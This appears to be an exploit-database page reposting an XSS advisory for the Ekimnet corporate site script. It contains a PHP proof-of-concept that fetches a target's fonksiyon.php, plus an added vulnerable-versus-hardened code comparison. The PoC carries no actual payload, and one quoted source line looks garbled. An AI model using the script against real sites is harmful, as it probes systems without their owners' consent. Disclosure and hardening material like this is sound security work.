Ekimnet Kurumsal Firma Scripti // Cross Site Scripting

CVE:
Category: CWE-79
Price: Unknown
Severity: High
Author:
Risk: High
Exploitation Type: Remote
Date: 2019-10-19
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100132

Below is a copy:

Ekimnet Kurumsal Firma Scripti // Cross Site Scripting
#!/usr/bin/php -f
<?php
##################################################################
# Exploit Title : Ekimnet Kurumsal Firma Scripti XSS
# Vendor Homepage : https://ekimnet.com/
# Software Link : https://ekimnet.com/2018-07-21_01-13-17/
#
# Author : z3r0fy
# www.bighatz.org - www.bugcontainer.gq
#
# Using PoC : php -f poc.php yourtarget.com   (host only; the script prepends http://)
##################################################################


/*
DESCRIPTION

User input reaches a sensitive sink.

Check index.php

18: echo echo $url;  // fonksiyon.php
6: $url = "http://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']);  // fonksiyon.php

*/

//
// HTTP SERVER, 
//

$target = $argv[1];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/fonksiyon.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>
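
The sink named in the PoC description (`$url` built from `HTTP_HOST` and `PHP_SELF`, then echoed) shown next to a hardened form, as an added example that is not part of the original advisory or the vendor's code. The allow-list `ALLOWED_HOSTS`, the function names and the sample request values are assumptions constructed for illustration.

```php
<?php
// Added example, not the vendor's code.
// ALLOWED_HOSTS and all function names below are assumptions.
const ALLOWED_HOSTS = ['www.example.test', 'example.test'];

// Pattern reported on the page (fonksiyon.php line 6), wrapped in a function
// so it can be fed constructed input instead of the live $_SERVER array.
function base_url_vulnerable(array $server): string
{
    return "http://" . $server['HTTP_HOST'] . dirname($server['PHP_SELF']);
}

function base_url_hardened(array $server): string
{
    // The Host header is client-controlled: accept known names only,
    // otherwise fall back to the canonical one.
    $host = strtolower($server['HTTP_HOST'] ?? '');
    if (!in_array($host, ALLOWED_HOSTS, true)) {
        $host = ALLOWED_HOSTS[0];
    }
    // SCRIPT_NAME excludes the trailing PATH_INFO that PHP_SELF carries.
    $dir = dirname($server['SCRIPT_NAME'] ?? '/');
    $dir = rtrim(str_replace('\\', '/', $dir), '/');
    return "http://" . $host . $dir;
}

// Escape at the sink regardless of how the value was built.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request data carrying a harmless markup marker.
$sample = [
    'HTTP_HOST'   => 'example.test"><i>marker</i>',
    'PHP_SELF'    => '/site/index.php/"><i>marker</i>/x',
    'SCRIPT_NAME' => '/site/index.php',
];

echo "vulnerable: ", base_url_vulnerable($sample), PHP_EOL;
echo "hardened:   ", h(base_url_hardened($sample)), PHP_EOL;
```

The vulnerable form reflects the marker markup from both the Host header and the path; the hardened form drops both and would still be escaped if either slipped through.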

Copyright ©2024 Exploitalert.
